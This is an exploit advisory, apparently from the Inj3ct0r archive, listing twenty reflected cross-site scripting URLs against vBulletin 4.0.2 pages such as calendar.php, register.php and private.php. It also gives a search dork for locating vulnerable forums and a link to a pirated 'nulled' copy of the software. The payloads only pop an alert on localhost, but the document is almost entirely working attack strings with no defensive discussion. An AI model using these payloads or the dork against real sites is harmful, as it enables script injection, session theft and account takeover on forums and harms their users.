vBulletin Version 4.0.2 Xss Vulnerability

==========================================
vBulletin  Version 4.0.2 Xss Vulnerability
==========================================

========================================================================================                  
| # Title    : vBulletin  Version 4.0.2 Cross Site Scripting in URI Vulnerability      
| # Author   : indoushka                                                                                                 
| # Web Site : http://www.digzip.com/files/54QE0JXS/vbulletin_4.0.2nulledfinal.rar                                                     
| # Dork     : Powered by vBulletin? Version 4.0.2                                                                                                              
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)       
| # Bug      : XSS                                                                     
======================      Exploit By indoushka       =================================
# Exploit  :  
 
http://127.0.0.1/upload/calendar.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/faq.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/forum.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/usercp.php/>"><ScRiPt>alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/subscription.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/showthread.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/showgroups.php/>"><ScRiPt>alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/sendmessage.php/>"><ScRiPt>alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/search.php/>"><ScRiPt>alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/register.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/profile.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/private.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/online.php/>"><ScRiPt>alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/newthread.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/misc.php/>"><ScRiPt>alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/memberlist.php?=>"'><ScRiPt>alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/member.php/>"><ScRiPt>alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/inlinemod.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/index.php/>"><ScRiPt>alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/forumdisplay.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>



# Inj3ct0r.com [2010-02-20]